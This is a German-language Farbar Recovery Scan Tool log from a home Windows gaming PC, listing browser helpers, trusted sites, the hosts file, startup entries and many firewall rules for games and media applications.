BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> D:\Java\2_51\bin\ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> D:\Java\2_51\bin\jp2ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - StExBar - {367D8B32-F9FD-474b-8E65-9E521F35DE99} - C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
Handler-x32: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files (x86)\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation) [Datei ist nicht signiert]
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2017-09-29 14:46 - 2017-09-29 14:44 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\DATA\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Tom_Admin\AppData\Local\Microsoft\WindowsApps;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img3.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "AutoStart IR.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WinTV Recording Status.lnk"
HKLM\...\StartupApproved\Run: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Updater"
HKLM\...\StartupApproved\Run32: => "RazerCortex"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\StartupFolder: => "Mounten.bat"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{BD15C3DA-E10D-41D0-B5D5-EE4073BAE9FC}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D801D41D-AFA4-467A-A7D7-22B79F9F5119}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\bin\diagnostics32.exe (Kristjan Skutta -> )
FirewallRules: [{5192CB57-269F-4830-B401-243CE137621C}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\bin\diagnostics32.exe (Kristjan Skutta -> )
FirewallRules: [UDP Query User{EE3FDA50-E1D2-43C2-9F0D-35D87E3F1DB1}D:\destiny 2\destiny2.exe] => (Allow) D:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [TCP Query User{87167C66-5737-4F03-9D50-3C797A513735}D:\destiny 2\destiny2.exe] => (Allow) D:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [{0C0F6526-9F01-495E-B99F-7C5C72975E8B}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A0349E6A-41C4-4855-A948-4C1652AA1068}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{C209067C-0A9E-464C-8DBE-CAA6A9E4E128}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D11E1927-A4AE-4EF5-982A-D1005A8C1EAB}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{35AC40B9-F015-4E98-B7C4-4F8F115557C1}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{AB72C65B-ECB2-4059-95B5-EEB7B291493E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{2C4E54F7-C88D-481D-9487-2F02DF4A38FC}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{0165E428-627A-4BC0-BEE7-9FD0082986F0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BAB32789-534B-4AA4-B1D5-03C070415FF4}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{7C958553-E95B-49CD-9A83-AFABF9450A62}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{29AB5D50-E693-461F-9183-EA5139443FD3}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{13C54269-5FCC-4752-8C89-1A121B264DC0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F1FD2F18-57D3-4350-9A03-810C6E7B8AFF}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1D7C0D77-5B56-4796-9A2C-ED92A9774778}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3F54FCDD-2F44-4E1E-843A-EAAB9B462CB9}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4B085E0F-D6CA-4A14-B0AF-DB661D429EFD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9EA32006-E640-4A10-A083-9579DBB93E25}] => (Allow) E:\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe () [Datei ist nicht signiert]
FirewallRules: [{6731630B-B532-4D84-A553-39FE5E91373B}] => (Allow) E:\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe () [Datei ist nicht signiert]
FirewallRules: [{EE313476-C63F-4F31-88A2-59C333476053}] => (Allow) E:\Steam\steamapps\common\100 Orange Juice\100orange.exe () [Datei ist nicht signiert]
FirewallRules: [{3A00DEDF-16D5-48D8-A980-F2D21C83BA9C}] => (Allow) E:\Steam\steamapps\common\100 Orange Juice\100orange.exe () [Datei ist nicht signiert]
FirewallRules: [{70EDCFA4-146C-48DD-9513-68384A778AF0}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing Inc -> )
FirewallRules: [{94CDA78E-4371-4F4B-856B-8D372AC84EBE}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing Inc -> )
FirewallRules: [{63AAB744-43E3-45DD-8026-C3BCB423BF4D}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing Inc -> )
FirewallRules: [{AC4ADE77-5978-4287-B4D6-8E1F453C2C27}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing Inc -> )
FirewallRules: [{1AFF76B9-1497-4A25-9D5B-FD3BD232CF7C}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6mp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{7BA2BFFB-3087-498A-8BE1-87CF1BA2AF65}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6mp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{1F3490BB-AC55-4811-8E0A-818157F97E6D}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6sp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{95D24FC7-FFD9-4C34-ACBC-D3D0334E35FA}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6sp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{9F6A2D78-39CD-435C-BF8D-FEAB86E2C736}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [Datei ist nicht signiert]
FirewallRules: [{72109CDC-500E-4C2E-A8A0-0D1A9CD3A97E}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [Datei ist nicht signiert]
FirewallRules: [{9D3F99FC-5ADC-47EA-BBE4-2036D6302C62}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6zm.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{E796248C-CD9B-4A48-ABB5-2C0366511F66}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6zm.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{B921D84F-4E37-4195-B698-158146C44AA6}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe => Keine Datei
FirewallRules: [TCP Query User{DBCF8B0A-BCB9-4F04-B202-DD4C0FD9230B}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe => Keine Datei
FirewallRules: [UDP Query User{CAB2B51D-64FE-4C99-A553-F0994E8A5319}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe => Keine Datei
FirewallRules: [TCP Query User{7992D3D0-6D71-471D-BB10-B7622254BF14}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe => Keine Datei
FirewallRules: [{C7CE56E5-543A-4CDA-810C-FAD0D1775853}] => (Allow) E:\Steam\steamapps\common\WitchIt\WitchIt\Binaries\Win64\PropWitchHuntModule-Win64-Shipping.exe (G=Barrel Roll Games) [Datei ist nicht signiert]
FirewallRules: [{CF69FE3D-74F5-430B-BE04-6C742F09205E}] => (Allow) E:\Steam\steamapps\common\WitchIt\WitchIt\Binaries\Win64\PropWitchHuntModule-Win64-Shipping.exe (G=Barrel Roll Games) [Datei ist nicht signiert]
FirewallRules: [{F7AEE517-FB88-4DC4-AC1A-E4F67F28E5D7}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\launcher.exe (Kristjan Skutta -> )
FirewallRules: [{05A8E69F-CE0E-4E92-838E-D8D042912391}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\launcher.exe (Kristjan Skutta -> )
FirewallRules: [{73C9C9B7-2B9E-4462-B909-649B007E2DE9}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{0C128D12-4F47-4510-9C44-74594AE81B75}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{1910727F-B431-46E1-9DAE-59154E8C9EE5}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{43523A67-08B9-47BD-A539-D4CF85F7D972}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{B8614B0D-C639-48E2-A796-7FEF3D544968}] => (Allow) E:\Steam\steamapps\common\Doki Doki Literature Club\DDLC.exe () [Datei ist nicht signiert]
FirewallRules: [{804EFEA7-6FD8-4DC2-BB20-3580DC75B674}] => (Allow) E:\Steam\steamapps\common\Doki Doki Literature Club\DDLC.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{B3DAF835-1103-4502-A4F2-333C915492CC}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe => Keine Datei
FirewallRules: [TCP Query User{E5237C02-DD9D-412E-9D87-98A20C9F70FD}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe => Keine Datei
FirewallRules: [UDP Query User{372F3926-A3A4-439F-BD19-73EB73FC3C7F}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe => Keine Datei
FirewallRules: [TCP Query User{BA2FAF92-717B-45F8-BA2A-F1EE91F18215}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe => Keine Datei
FirewallRules: [{F1D77999-207A-4802-A520-8DE20D475A74}] => (Allow) E:\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EE3459FC-3479-43B1-9C9F-77FF4A957F6F}] => (Allow) E:\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{3777AA31-B03D-4B65-83CC-4E31445ACB6A}] => (Allow) E:\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe () [Datei ist nicht signiert]
FirewallRules: [{414649EA-3580-4193-BB71-7756C6C0FBBD}] => (Allow) E:\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe () [Datei ist nicht signiert]
FirewallRules: [{529E9E0A-FB5D-436A-A033-7FDF2BEE0F37}] => (Allow) E:\Steam\steamapps\common\War Selection\SteamLauncher.exe () [Datei ist nicht signiert]
FirewallRules: [{ECDF4C86-E8D8-4AE8-8889-3EF2E669EF7D}] => (Allow) E:\Steam\steamapps\common\War Selection\SteamLauncher.exe () [Datei ist nicht signiert]
FirewallRules: [{173E14B5-C91A-4784-9A0E-528881F5C540}] => (Allow) E:\Steam\steamapps\common\SoulWorker\SoulWorker.exe (LIONGAMES Co.,Ltd. -> LION GAMES)
FirewallRules: [{80BAF223-9E21-40D4-9AF9-3166287552E8}] => (Allow) E:\Steam\steamapps\common\SoulWorker\SoulWorker.exe (LIONGAMES Co.,Ltd. -> LION GAMES)
FirewallRules: [{E10E60EA-A979-47B5-8E55-10395ABEAF18}] => (Allow) E:\Steam\steamapps\common\Soundpad\Soundpad.exe (Arthur Lepp -> Leppsoft)
FirewallRules: [{9846D564-21F9-48D8-A5D1-BD97BFA24051}] => (Allow) E:\Steam\steamapps\common\Soundpad\Soundpad.exe (Arthur Lepp -> Leppsoft)
FirewallRules: [UDP Query User{7D8F4D0F-D749-40B8-B516-886EA3FBC537}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{302357B1-32CB-4A88-8837-6287A6C5D356}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{E4ADA23B-0959-4D5D-BFA1-A3F2FAA524CD}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{AE6679F5-4B43-4F88-84BE-0FFACD2AE166}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{E4BC8C36-999C-48FC-97D4-1707D6391E7C}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{C4244604-BB38-4522-A549-C1D1FF99091A}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{4E494180-EAE9-44B8-9944-1BD61D095493}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{BF4C51D7-A79D-4D2D-A094-4A290359E085}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{7920A431-019D-4E78-964C-9AA16CAF6946}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => Keine Datei
FirewallRules: [{53FD37C3-34B9-48F2-9806-E1123527BF7E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [{B2F24C64-B7EA-4678-BAAE-3D1C4D93CC15}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\OxygenPanelDaemon.exe => Keine Datei
FirewallRules: [{E1FC722E-F384-45FA-B184-358165CC39BD}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\ElementsPanelDaemon.exe => Keine Datei
FirewallRules: [{F368F331-43E6-41B4-AAAE-7992BA2048A0}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\TangentPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{FD6EB5B5-984D-42E5-8DD3-5AD0603AE72E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\EuphonixPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{36BA625D-6AEB-406B-A524-9877CD8AE707}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\JLCooperPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{2A7DC3AF-2F69-4158-B8E7-9FC5140072D0}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DaVinciPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{7F28FC9B-F942-4A1D-81BF-4A43DA75F4A9}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\bmdpaneld.exe () [Datei ist nicht signiert]
FirewallRules: [{AB3D2980-EC58-4FE1-BE3B-C017B65F5E6E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [UDP Query User{3BDF9600-467C-4F15-ACCE-3CA5FFB5BDAF}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe] => (Allow) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe => Keine Datei
FirewallRules: [TCP Query User{CFE90057-BCEA-40A0-AE51-739D95EE5092}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe] => (Allow) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe => Keine Datei
FirewallRules: [{EA2F1E39-6712-4C12-9D67-26F0DF53BDF9}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{8F4E3083-172F-4C97-AE3E-4511F2CC6685}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [UDP Query User{49DD3D9C-1901-4C96-AD47-05FC38107620}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe => Keine Datei
FirewallRules: [TCP Query User{A0FF624F-5498-449F-8F18-9DF4347EF500}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe => Keine Datei
FirewallRules: [{B50C0665-9A28-41B0-A5EA-571FA2C10838}] => (Allow) E:\Steam\steamapps\common\GarrysMod\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{F3924350-8BD5-496B-BC41-69C9D3CEDF16}] => (Allow) E:\Steam\steamapps\common\GarrysMod\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{653AE7B7-6E8A-4772-ABD1-69599B2D09DA}E:\blizzard\overwatch\_retail_\overwatch.exe] => (Allow) E:\blizzard\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{BABDDC9D-DE4D-4CA8-8501-0FCC2A9533ED}E:\blizzard\overwatch\_retail_\overwatch.exe] => (Allow) E:\blizzard\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [{C3870430-EA9B-4165-947C-34055AE7BB2A}] => (Allow) E:\Steam\steamapps\common\Bloons TD Battles\Battles-Win.exe () [Datei ist nicht signiert]
FirewallRules: [{030BE0D6-B32A-4BB9-B1CF-E9638E6BE7F3}] => (Allow) E:\Steam\steamapps\common\Bloons TD Battles\Battles-Win.exe () [Datei ist nicht signiert]
FirewallRules: [{152C34D8-BE01-420A-B064-F5FB94D50612}] => (Allow) D:\Anthem\Anthem\Anthem.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{3B0CCABF-C677-4C58-9B93-1633B45CA5F3}] => (Allow) D:\Anthem\Anthem\Anthem.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{6D5FF305-F38F-4487-932A-FC70AA3D0C40}] => (Allow) D:\Anthem\Anthem\AnthemTrial.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{0AC2070C-3F95-464C-80F0-0B881F4C5D78}] => (Allow) D:\Anthem\Anthem\AnthemTrial.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{878991CD-C715-4487-B53F-9229F25B2946}] => (Allow) E:\Steam\steamapps\common\狐の旅路\Game.exe (KADOKAWA) [Datei ist nicht signiert]
FirewallRules: [{E7F28D94-907D-4A63-9636-CABAB053D231}] => (Allow) E:\Steam\steamapps\common\狐の旅路\Game.exe (KADOKAWA) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{5D9876C9-9E03-4927-BCB4-4BB638D0C5F3}C:\users\vincent\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vincent\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{4538A7B8-EBFC-4257-910F-C42BEE1C9AFC}C:\users\vincent\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vincent\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{096A800B-B0D8-4A04-BDEB-35650147920D}] => (Allow) E:\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{A9944F10-ADDD-4551-AC76-A65B03AF93FA}] => (Allow) E:\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{4290AA66-5B70-45D2-8754-A455817ECC1A}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2_trial.exe => Keine Datei
FirewallRules: [{0418DBE6-91BF-41C4-A146-51AD62FA1B6F}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2_trial.exe => Keine Datei
FirewallRules: [{E27D5C60-5867-405E-9898-1297F68846ED}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2.exe => Keine Datei
FirewallRules: [{E46CAF76-8365-403F-8CCA-80B765937C59}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2.exe => Keine Datei
FirewallRules: [UDP Query User{BA61DA4B-E097-4187-A1B3-4576B2FF86CA}E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => (Allow) E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe => Keine Datei
FirewallRules: [TCP Query User{45A41EF6-B90C-440E-B73B-DCEC2C300056}E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => (Allow) E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe => Keine Datei
FirewallRules: [{05876600-DE03-4400-8C18-E2FF7F8DFB1E}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe => Keine Datei
FirewallRules: [{278DE2F2-E028-48A2-80E2-FEDDAFC28FB1}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe => Keine Datei
FirewallRules: [UDP Query User{027A1EAD-C8D3-418E-A00B-7B52AA699394}E:\overwatch\overwatch\_retail_\overwatch.exe] => (Allow) E:\overwatch\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{3DE299EE-7B5B-460C-93AF-D2CBA5F3AF2C}E:\overwatch\overwatch\_retail_\overwatch.exe] => (Allow) E:\overwatch\overwatch\_retail_\overwatch.exe => Keine Datei
